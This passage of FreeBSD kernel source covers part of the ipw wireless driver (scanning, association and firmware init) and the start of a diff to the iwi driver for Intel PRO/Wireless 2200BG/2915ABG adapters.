ielen) { struct ipw_wpa_ie wpaie; memset(&wpaie, 0, sizeof(wpaie)); wpaie.len = htole32(ielen); /* XXX verify length */ memcpy(&wpaie.ie, ie, ielen); DPRINTF(("Setting WPA IE\n")); return ipw_cmd(sc, IPW_CMD_SET_WPA_IE, &wpaie, sizeof(wpaie)); } static int ipw_setbssid(struct ipw_softc *sc, uint8_t *bssid) { static const uint8_t zerobssid[IEEE80211_ADDR_LEN]; if (bssid == NULL || bcmp(bssid, zerobssid, IEEE80211_ADDR_LEN) == 0) { DPRINTF(("Setting mandatory BSSID to null\n")); return ipw_cmd(sc, IPW_CMD_SET_MANDATORY_BSSID, NULL, 0); } else { DPRINTF(("Setting mandatory BSSID to %6D\n", bssid, ":")); return ipw_cmd(sc, IPW_CMD_SET_MANDATORY_BSSID, bssid, IEEE80211_ADDR_LEN); } } static int ipw_setssid(struct ipw_softc *sc, void *ssid, size_t ssidlen) { if (ssidlen == 0) { /* * A bug in the firmware breaks the ``don't associate'' * bit in the scan options command. To compensate for * this install a bogus ssid when no ssid is specified * so the firmware won't try to associate. */ DPRINTF(("Setting bogus ESSID to WAR firmware bug\n")); return ipw_cmd(sc, IPW_CMD_SET_ESSID, "\x18\x19\x20\x21\x22\x23\x24\x25\x26\x27" "\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31" "\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" "\x3c\x3d", IEEE80211_NWID_LEN); } else { #ifdef IPW_DEBUG if (ipw_debug > 0) { printf("Setting ESSID to "); ieee80211_print_essid(ssid, ssidlen); printf("\n"); } #endif return ipw_cmd(sc, IPW_CMD_SET_ESSID, ssid, ssidlen); } } static int ipw_setscanopts(struct ipw_softc *sc, uint32_t chanmask, uint32_t flags) { struct ipw_scan_options opts; DPRINTF(("Scan options: mask 0x%x flags 0x%x\n", chanmask, flags)); opts.channels = htole32(chanmask); opts.flags = htole32(flags); return ipw_cmd(sc, IPW_CMD_SET_SCAN_OPTIONS, &opts, sizeof(opts)); } static int ipw_scan(struct ipw_softc *sc) { uint32_t params; int error; DPRINTF(("%s: flags 0x%x\n", __func__, sc->flags)); if (sc->flags & IPW_FLAG_SCANNING) return (EBUSY); sc->flags |= IPW_FLAG_SCANNING | IPW_FLAG_HACK; /* NB: IPW_SCAN_DO_NOT_ASSOCIATE does not work (we set it anyway) */ error = ipw_setscanopts(sc, 0x3fff, IPW_SCAN_DO_NOT_ASSOCIATE); if (error != 0) goto done; /* * Setup null/bogus ssid so firmware doesn't use any previous * ssid to try and associate. This is because the ``don't * associate'' option bit is broken (sigh). */ error = ipw_setssid(sc, NULL, 0); if (error != 0) goto done; /* * NB: the adapter may be disabled on association lost; * if so just re-enable it to kick off scanning. */ DPRINTF(("Starting scan\n")); sc->sc_scan_timer = 3; if (sc->flags & IPW_FLAG_ENABLED) { params = 0; /* XXX? */ error = ipw_cmd(sc, IPW_CMD_BROADCAST_SCAN, ¶ms, sizeof(params)); } else error = ipw_enable(sc); done: if (error != 0) { DPRINTF(("Scan failed\n")); sc->flags &= ~(IPW_FLAG_SCANNING | IPW_FLAG_HACK); } return (error); } static int ipw_setchannel(struct ipw_softc *sc, struct ieee80211_channel *chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t data; int error; data = htole32(ieee80211_chan2ieee(ic, chan)); DPRINTF(("Setting channel to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_CHANNEL, &data, sizeof data); if (error == 0) ipw_setcurchan(sc, chan); return error; } static void ipw_assoc(struct ieee80211com *ic, struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; struct ieee80211_node *ni = vap->iv_bss; struct ipw_security security; uint32_t data; int error; IPW_LOCK(sc); error = ipw_disable(sc); if (error != 0) goto done; memset(&security, 0, sizeof security); security.authmode = (ni->ni_authmode == IEEE80211_AUTH_SHARED) ? IPW_AUTH_SHARED : IPW_AUTH_OPEN; security.ciphers = htole32(IPW_CIPHER_NONE); DPRINTF(("Setting authmode to %u\n", security.authmode)); error = ipw_cmd(sc, IPW_CMD_SET_SECURITY_INFO, &security, sizeof security); if (error != 0) goto done; data = htole32(vap->iv_rtsthreshold); DPRINTF(("Setting RTS threshold to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_RTS_THRESHOLD, &data, sizeof data); if (error != 0) goto done; data = htole32(vap->iv_fragthreshold); DPRINTF(("Setting frag threshold to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_FRAG_THRESHOLD, &data, sizeof data); if (error != 0) goto done; if (vap->iv_flags & IEEE80211_F_PRIVACY) { error = ipw_setwepkeys(sc); if (error != 0) goto done; if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) { data = htole32(vap->iv_def_txkey); DPRINTF(("Setting wep tx key index to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_WEP_KEY_INDEX, &data, sizeof data); if (error != 0) goto done; } } data = htole32((vap->iv_flags & IEEE80211_F_PRIVACY) ? IPW_WEPON : 0); DPRINTF(("Setting wep flags to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_WEP_FLAGS, &data, sizeof data); if (error != 0) goto done; error = ipw_setssid(sc, ni->ni_essid, ni->ni_esslen); if (error != 0) goto done; error = ipw_setbssid(sc, ni->ni_bssid); if (error != 0) goto done; if (vap->iv_appie_wpa != NULL) { struct ieee80211_appie *ie = vap->iv_appie_wpa; error = ipw_setwpaie(sc, ie->ie_data, ie->ie_len); if (error != 0) goto done; } if (ic->ic_opmode == IEEE80211_M_IBSS) { error = ipw_setchannel(sc, ni->ni_chan); if (error != 0) goto done; } /* lock scan to ap's channel and enable associate */ error = ipw_setscanopts(sc, 1<<(ieee80211_chan2ieee(ic, ni->ni_chan)-1), 0); if (error != 0) goto done; error = ipw_enable(sc); /* finally, enable adapter */ if (error == 0) sc->flags |= IPW_FLAG_ASSOCIATING; done: IPW_UNLOCK(sc); } static void ipw_disassoc(struct ieee80211com *ic, struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ic->ic_ifp; struct ieee80211_node *ni = vap->iv_bss; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); DPRINTF(("Disassociate from %6D\n", ni->ni_bssid, ":")); /* * NB: don't try to do this if ipw_stop_master has * shutdown the firmware and disabled interrupts. */ if (sc->flags & IPW_FLAG_FW_INITED) { sc->flags &= ~IPW_FLAG_ASSOCIATED; /* * NB: firmware currently ignores bssid parameter, but * supply it in case this changes (follow linux driver). */ (void) ipw_cmd(sc, IPW_CMD_DISASSOCIATE, ni->ni_bssid, IEEE80211_ADDR_LEN); } IPW_UNLOCK(sc); } /* * Handler for sc_init_task. This is a simple wrapper around ipw_init(). * It is called on firmware panics or on watchdog timeouts. */ static void ipw_init_task(void *context, int pending) { ipw_init(context); } static void ipw_init(void *priv) { struct ipw_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IPW_LOCK(sc); ipw_init_locked(sc); IPW_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void ipw_init_locked(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); const struct firmware *fp; const struct ipw_firmware_hdr *hdr; const char *fw; IPW_LOCK_ASSERT(sc); DPRINTF(("%s: state %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], sc->flags)); /* * Avoid re-entrant calls. We need to release the mutex in ipw_init() * when loading the firmware and we don't want to be called during this * operation. */ if (sc->flags & IPW_FLAG_INIT_LOCKED) return; sc->flags |= IPW_FLAG_INIT_LOCKED; ipw_stop_locked(sc); if (ipw_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset adapter\n"); goto fail; } if (sc->sc_firmware == NULL) { device_printf(sc->sc_dev, "no firmware\n"); goto fail; } /* NB: consistency already checked on load */ fp = sc->sc_firmware; hdr = (const struct ipw_firmware_hdr *)fp->data; DPRINTF(("Loading firmware image '%s'\n", fp->name)); fw = (const char *)fp->data + sizeof *hdr + le32toh(hdr->mainsz); if (ipw_load_ucode(sc, fw, le32toh(hdr->ucodesz)) != 0) { device_printf(sc->sc_dev, "could not load microcode\n"); goto fail; } ipw_stop_master(sc); /* * Setup tx, rx and status rings. */ sc->txold = IPW_NTBD - 1; sc->txcur = 0; sc->txfree = IPW_NTBD - 2; sc->rxcur = IPW_NRBD - 1; CSR_WRITE_4(sc, IPW_CSR_TX_BASE, sc->tbd_phys); CSR_WRITE_4(sc, IPW_CSR_TX_SIZE, IPW_NTBD); CSR_WRITE_4(sc, IPW_CSR_TX_READ, 0); CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); CSR_WRITE_4(sc, IPW_CSR_RX_BASE, sc->rbd_phys); CSR_WRITE_4(sc, IPW_CSR_RX_SIZE, IPW_NRBD); CSR_WRITE_4(sc, IPW_CSR_RX_READ, 0); CSR_WRITE_4(sc, IPW_CSR_RX_WRITE, sc->rxcur); CSR_WRITE_4(sc, IPW_CSR_STATUS_BASE, sc->status_phys); fw = (const char *)fp->data + sizeof *hdr; if (ipw_load_firmware(sc, fw, le32toh(hdr->mainsz)) != 0) { device_printf(sc->sc_dev, "could not load firmware\n"); goto fail; } sc->flags |= IPW_FLAG_FW_INITED; /* retrieve information tables base addresses */ sc->table1_base = CSR_READ_4(sc, IPW_CSR_TABLE1_BASE); sc->table2_base = CSR_READ_4(sc, IPW_CSR_TABLE2_BASE); ipw_write_table1(sc, IPW_INFO_LOCK, 0); if (ipw_config(sc) != 0) { device_printf(sc->sc_dev, "device configuration failed\n"); goto fail; } callout_reset(&sc->sc_wdtimer, hz, ipw_watchdog, sc); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->flags &=~ IPW_FLAG_INIT_LOCKED; return; fail: ipw_stop_locked(sc); sc->flags &=~ IPW_FLAG_INIT_LOCKED; } static int ipw_config(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ipw_configuration config; uint32_t data; int error; error = ipw_disable(sc); if (error != 0) return error; switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_HOSTAP: case IEEE80211_M_WDS: /* XXX */ data = htole32(IPW_MODE_BSS); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: data = htole32(IPW_MODE_IBSS); break; case IEEE80211_M_MONITOR: data = htole32(IPW_MODE_MONITOR); break; default: device_printf(sc->sc_dev, "unknown opmode %d\n", ic->ic_opmode); return EINVAL; } DPRINTF(("Setting mode to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_MODE, &data, sizeof data); if (error != 0) return error; if (ic->ic_opmode == IEEE80211_M_IBSS || ic->ic_opmode == IEEE80211_M_MONITOR) { error = ipw_setchannel(sc, ic->ic_curchan); if (error != 0) return error; } if (ic->ic_opmode == IEEE80211_M_MONITOR) return ipw_enable(sc); config.flags = htole32(IPW_CFG_BSS_MASK | IPW_CFG_IBSS_MASK | IPW_CFG_PREAMBLE_AUTO | IPW_CFG_802_1x_ENABLE); if (ic->ic_opmode == IEEE80211_M_IBSS) config.flags |= htole32(IPW_CFG_IBSS_AUTO_START); if (ifp->if_flags & IFF_PROMISC) config.flags |= htole32(IPW_CFG_PROMISCUOUS); config.bss_chan = htole32(0x3fff); /* channels 1-14 */ config.ibss_chan = htole32(0x7ff); /* channels 1-11 */ DPRINTF(("Setting configuration to 0x%x\n", le32toh(config.flags))); error = ipw_cmd(sc, IPW_CMD_SET_CONFIGURATION, &config, sizeof config); if (error != 0) return error; data = htole32(0xf); /* 1, 2, 5.5, 11 */ DPRINTF(("Setting basic tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_BASIC_TX_RATES, &data, sizeof data); if (error != 0) return error; /* Use the same rate set */ DPRINTF(("Setting msdu tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_MSDU_TX_RATES, &data, sizeof data); if (error != 0) return error; /* Use the same rate set */ DPRINTF(("Setting tx rates to 0x%x\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_TX_RATES, &data, sizeof data); if (error != 0) return error; data = htole32(IPW_POWER_MODE_CAM); DPRINTF(("Setting power mode to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_POWER_MODE, &data, sizeof data); if (error != 0) return error; if (ic->ic_opmode == IEEE80211_M_IBSS) { data = htole32(32); /* default value */ DPRINTF(("Setting tx power index to %u\n", le32toh(data))); error = ipw_cmd(sc, IPW_CMD_SET_TX_POWER_INDEX, &data, sizeof data); if (error != 0) return error; } return 0; } static void ipw_stop(void *priv) { struct ipw_softc *sc = priv; IPW_LOCK(sc); ipw_stop_locked(sc); IPW_UNLOCK(sc); } static void ipw_stop_locked(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int i; IPW_LOCK_ASSERT(sc); callout_stop(&sc->sc_wdtimer); ipw_stop_master(sc); CSR_WRITE_4(sc, IPW_CSR_RST, IPW_RST_SW_RESET); /* * Release tx buffers. */ for (i = 0; i < IPW_NTBD; i++) ipw_release_sbd(sc, &sc->stbd_list[i]); sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } static int ipw_sysctl_stats(SYSCTL_HANDLER_ARGS) { struct ipw_softc *sc = arg1; uint32_t i, size, buf[256]; memset(buf, 0, sizeof buf); if (!(sc->flags & IPW_FLAG_FW_INITED)) return SYSCTL_OUT(req, buf, sizeof buf); CSR_WRITE_4(sc, IPW_CSR_AUTOINC_ADDR, sc->table1_base); size = min(CSR_READ_4(sc, IPW_CSR_AUTOINC_DATA), 256); for (i = 1; i < size; i++) buf[i] = MEM_READ_4(sc, CSR_READ_4(sc, IPW_CSR_AUTOINC_DATA)); return SYSCTL_OUT(req, buf, size); } static int ipw_sysctl_radio(SYSCTL_HANDLER_ARGS) { struct ipw_softc *sc = arg1; int val; val = !((sc->flags & IPW_FLAG_HAS_RADIO_SWITCH) && (CSR_READ_4(sc, IPW_CSR_IO) & IPW_IO_RADIO_DISABLED)); return SYSCTL_OUT(req, &val, sizeof val); } static uint32_t ipw_read_table1(struct ipw_softc *sc, uint32_t off) { return MEM_READ_4(sc, MEM_READ_4(sc, sc->table1_base + off)); } static void ipw_write_table1(struct ipw_softc *sc, uint32_t off, uint32_t info) { MEM_WRITE_4(sc, MEM_READ_4(sc, sc->table1_base + off), info); } #if 0 static int ipw_read_table2(struct ipw_softc *sc, uint32_t off, void *buf, uint32_t *len) { uint32_t addr, info; uint16_t count, size; uint32_t total; /* addr[4] + count[2] + size[2] */ addr = MEM_READ_4(sc, sc->table2_base + off); info = MEM_READ_4(sc, sc->table2_base + off + 4); count = info >> 16; size = info & 0xffff; total = count * size; if (total > *len) { *len = total; return EINVAL; } *len = total; ipw_read_mem_1(sc, addr, buf, total); return 0; } static void ipw_read_mem_1(struct ipw_softc *sc, bus_size_t offset, uint8_t *datap, bus_size_t count) { for (; count > 0; offset++, datap++, count--) { CSR_WRITE_4(sc, IPW_CSR_INDIRECT_ADDR, offset & ~3); *datap = CSR_READ_1(sc, IPW_CSR_INDIRECT_DATA + (offset & 3)); } } #endif static void ipw_write_mem_1(struct ipw_softc *sc, bus_size_t offset, const uint8_t *datap, bus_size_t count) { for (; count > 0; offset++, datap++, count--) { CSR_WRITE_4(sc, IPW_CSR_INDIRECT_ADDR, offset & ~3); CSR_WRITE_1(sc, IPW_CSR_INDIRECT_DATA + (offset & 3), *datap); } } static void ipw_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); ipw_scan(sc); IPW_UNLOCK(sc); } static void ipw_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); if (ic->ic_opmode == IEEE80211_M_MONITOR) { ipw_disable(sc); ipw_setchannel(sc, ic->ic_curchan); ipw_enable(sc); } IPW_UNLOCK(sc); } static void ipw_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { /* NB: all channels are scanned at once */ } static void ipw_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void ipw_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; IPW_UNLOCK(sc); } diff --git a/sys/dev/iwi/if_iwi.c b/sys/dev/iwi/if_iwi.c index 9373c2feac35..f0133895a516 100644 --- a/sys/dev/iwi/if_iwi.c +++ b/sys/dev/iwi/if_iwi.c @@ -1,3589 +1,3589 @@ /*- * Copyright (c) 2004, 2005 * Damien Bergamini . All rights reserved. * Copyright (c) 2005-2006 Sam Leffler, Errno Consulting * Copyright (c) 2007 Andrew Thompson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice unmodified, this list of conditions, and the following * disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); /*- * Intel(R) PRO/Wireless 2200BG/2225BG/2915ABG driver * http://www.intel.com/network/connectivity/products/wireless/prowireless_mobile.htm */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IWI_DEBUG #ifdef IWI_DEBUG #define DPRINTF(x) do { if (iwi_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (iwi_debug >= (n)) printf x; } while (0) int iwi_debug = 0; SYSCTL_INT(_debug, OID_AUTO, iwi, CTLFLAG_RW, &iwi_debug, 0, "iwi debug level"); static const char *iwi_fw_states[] = { "IDLE", /* IWI_FW_IDLE */ "LOADING", /* IWI_FW_LOADING */ "ASSOCIATING", /* IWI_FW_ASSOCIATING */ "DISASSOCIATING", /* IWI_FW_DISASSOCIATING */ "SCANNING", /* IWI_FW_SCANNING */ }; #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif MODULE_DEPEND(iwi, pci, 1, 1, 1); MODULE_DEPEND(iwi, wlan, 1, 1, 1); MODULE_DEPEND(iwi, firmware, 1, 1, 1); enum { IWI_LED_TX, IWI_LED_RX, IWI_LED_POLL, }; struct iwi_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct iwi_ident iwi_ident_table[] = { { 0x8086, 0x4220, "Intel(R) PRO/Wireless 2200BG" }, { 0x8086, 0x4221, "Intel(R) PRO/Wireless 2225BG" }, { 0x8086, 0x4223, "Intel(R) PRO/Wireless 2915ABG" }, { 0x8086, 0x4224, "Intel(R) PRO/Wireless 2915ABG" }, { 0, 0, NULL } }; static struct ieee80211vap *iwi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void iwi_vap_delete(struct ieee80211vap *); static void iwi_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int iwi_alloc_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *, int); static void iwi_reset_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *); static void iwi_free_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *); static int iwi_alloc_tx_ring(struct iwi_softc *, struct iwi_tx_ring *, int, bus_addr_t, bus_addr_t); static void iwi_reset_tx_ring(struct iwi_softc *, struct iwi_tx_ring *); static void iwi_free_tx_ring(struct iwi_softc *, struct iwi_tx_ring *); static int iwi_alloc_rx_ring(struct iwi_softc *, struct iwi_rx_ring *, int); static void iwi_reset_rx_ring(struct iwi_softc *, struct iwi_rx_ring *); static void iwi_free_rx_ring(struct iwi_softc *, struct iwi_rx_ring *); static struct ieee80211_node *iwi_node_alloc(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN]); static void iwi_node_free(struct ieee80211_node *); static void iwi_media_status(struct ifnet *, struct ifmediareq *); static int iwi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void iwi_wme_init(struct iwi_softc *); static int iwi_wme_setparams(struct iwi_softc *, struct ieee80211com *); static void iwi_update_wme(void *, int); static int iwi_wme_update(struct ieee80211com *); static uint16_t iwi_read_prom_word(struct iwi_softc *, uint8_t); static void iwi_frame_intr(struct iwi_softc *, struct iwi_rx_data *, int, struct iwi_frame *); static void iwi_notification_intr(struct iwi_softc *, struct iwi_notif *); static void iwi_rx_intr(struct iwi_softc *); static void iwi_tx_intr(struct iwi_softc *, struct iwi_tx_ring *); static void iwi_intr(void *); static int iwi_cmd(struct iwi_softc *, uint8_t, void *, uint8_t); static void iwi_write_ibssnode(struct iwi_softc *, const u_int8_t [], int); static int iwi_tx_start(struct ifnet *, struct mbuf *, struct ieee80211_node *, int); static int iwi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void iwi_start_locked(struct ifnet *); static void iwi_start(struct ifnet *); static void iwi_watchdog(void *); static int iwi_ioctl(struct ifnet *, u_long, caddr_t); static void iwi_stop_master(struct iwi_softc *); static int iwi_reset(struct iwi_softc *); static int iwi_load_ucode(struct iwi_softc *, const struct iwi_fw *); static int iwi_load_firmware(struct iwi_softc *, const struct iwi_fw *); static void iwi_release_fw_dma(struct iwi_softc *sc); static int iwi_config(struct iwi_softc *); static int iwi_get_firmware(struct iwi_softc *, enum ieee80211_opmode); static void iwi_put_firmware(struct iwi_softc *); static void iwi_monitor_scan(void *, int); static int iwi_scanchan(struct iwi_softc *, unsigned long, int); static void iwi_scan_start(struct ieee80211com *); static void iwi_scan_end(struct ieee80211com *); static void iwi_set_channel(struct ieee80211com *); static void iwi_scan_curchan(struct ieee80211_scan_state *, unsigned long maxdwell); static void iwi_scan_mindwell(struct ieee80211_scan_state *); static int iwi_auth_and_assoc(struct iwi_softc *, struct ieee80211vap *); static void iwi_disassoc(void *, int); static int iwi_disassociate(struct iwi_softc *, int quiet); static void iwi_init_locked(struct iwi_softc *); static void iwi_init(void *); static int iwi_init_fw_dma(struct iwi_softc *, int); static void iwi_stop_locked(void *); static void iwi_stop(struct iwi_softc *); static void iwi_restart(void *, int); static int iwi_getrfkill(struct iwi_softc *); static void iwi_radio_on(void *, int); static void iwi_radio_off(void *, int); static void iwi_sysctlattach(struct iwi_softc *); static void iwi_led_event(struct iwi_softc *, int); static void iwi_ledattach(struct iwi_softc *); static int iwi_probe(device_t); static int iwi_attach(device_t); static int iwi_detach(device_t); static int iwi_shutdown(device_t); static int iwi_suspend(device_t); static int iwi_resume(device_t); static device_method_t iwi_methods[] = { /* Device interface */ DEVMETHOD(device_probe, iwi_probe), DEVMETHOD(device_attach, iwi_attach), DEVMETHOD(device_detach, iwi_detach), DEVMETHOD(device_shutdown, iwi_shutdown), DEVMETHOD(device_suspend, iwi_suspend), DEVMETHOD(device_resume, iwi_resume), DEVMETHOD_END }; static driver_t iwi_driver = { "iwi", iwi_methods, sizeof (struct iwi_softc) }; static devclass_t iwi_devclass; DRIVER_MODULE(iwi, pci, iwi_driver, iwi_devclass, NULL, NULL); MODULE_VERSION(iwi, 1); static __inline uint8_t MEM_READ_1(struct iwi_softc *sc, uint32_t addr) { CSR_WRITE_4(sc, IWI_CSR_INDIRECT_ADDR, addr); return CSR_READ_1(sc, IWI_CSR_INDIRECT_DATA); } static __inline uint32_t MEM_READ_4(struct iwi_softc *sc, uint32_t addr) { CSR_WRITE_4(sc, IWI_CSR_INDIRECT_ADDR, addr); return CSR_READ_4(sc, IWI_CSR_INDIRECT_DATA); } static int iwi_probe(device_t dev) { const struct iwi_ident *ident; for (ident = iwi_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } static int iwi_attach(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; uint16_t val; int i, error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); return ENXIO; } ic = ifp->if_l2com; IWI_LOCK_INIT(sc); sc->sc_unr = new_unrhdr(1, IWI_MAX_IBSSNODE-1, &sc->sc_mtx); TASK_INIT(&sc->sc_radiontask, 0, iwi_radio_on, sc); TASK_INIT(&sc->sc_radiofftask, 0, iwi_radio_off, sc); TASK_INIT(&sc->sc_restarttask, 0, iwi_restart, sc); TASK_INIT(&sc->sc_disassoctask, 0, iwi_disassoc, sc); TASK_INIT(&sc->sc_wmetask, 0, iwi_update_wme, sc); TASK_INIT(&sc->sc_monitortask, 0, iwi_monitor_scan, sc); callout_init_mtx(&sc->sc_wdtimer, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_rftimer, &sc->sc_mtx, 0); pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); i = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &i, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &i, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); goto fail; } if (iwi_reset(sc) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail; } /* * Allocate rings. */ if (iwi_alloc_cmd_ring(sc, &sc->cmdq, IWI_CMD_RING_COUNT) != 0) { device_printf(dev, "could not allocate Cmd ring\n"); goto fail; } for (i = 0; i < 4; i++) { error = iwi_alloc_tx_ring(sc, &sc->txq[i], IWI_TX_RING_COUNT, IWI_CSR_TX1_RIDX + i * 4, IWI_CSR_TX1_WIDX + i * 4); if (error != 0) { device_printf(dev, "could not allocate Tx ring %d\n", i+i); goto fail; } } if (iwi_alloc_rx_ring(sc, &sc->rxq, IWI_RX_RING_COUNT) != 0) { device_printf(dev, "could not allocate Rx ring\n"); goto fail; } iwi_wme_init(sc); ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = iwi_init; ifp->if_ioctl = iwi_ioctl; ifp->if_start = iwi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_PMGT /* power save supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i */ | IEEE80211_C_WME /* 802.11e */ #if 0 | IEEE80211_C_BGSCAN /* capable of bg scanning */ #endif ; /* read MAC address from EEPROM */ val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 0); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 1); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 2); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (pci_get_device(dev) >= 0x4223) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); /* override default methods */ ic->ic_node_alloc = iwi_node_alloc; sc->sc_node_free = ic->ic_node_free; ic->ic_node_free = iwi_node_free; ic->ic_raw_xmit = iwi_raw_xmit; 